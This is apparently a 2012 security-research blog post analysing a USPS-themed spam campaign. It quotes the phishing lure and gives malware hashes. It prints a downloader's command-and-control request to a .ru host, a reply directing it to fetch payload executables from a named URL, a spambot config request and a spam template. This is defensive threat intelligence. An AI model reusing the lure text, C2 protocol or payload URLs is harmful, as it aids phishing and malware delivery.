Contact to the nearest post office

On 2012-04-26 we observed a round of USPS flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office “. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim filesystem in the following location C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at  everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”%%BND:1%%”
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:

  • luxas87612.ru
  • bristol1883314.ru
  • equator991534.ru
  • ocean8838354.ru
  • chukchi293494.ru
  • chart71445.ru
  • chart71445.ru
  • kiribati23547.ru
  • united55658.ru
  • surero14568.ru
  • virific2012b.ru

We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Advertisements

2 Comments

  1. Stacey
    Posted May 3, 2012 at 7:41 am | Permalink | Reply

    So how do I get rid of this?

  2. Posted January 22, 2013 at 4:26 pm | Permalink | Reply

    I think the admin of this web page is really working hard in favor
    of his web page, for the reason that here every stuff is quality
    based data.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: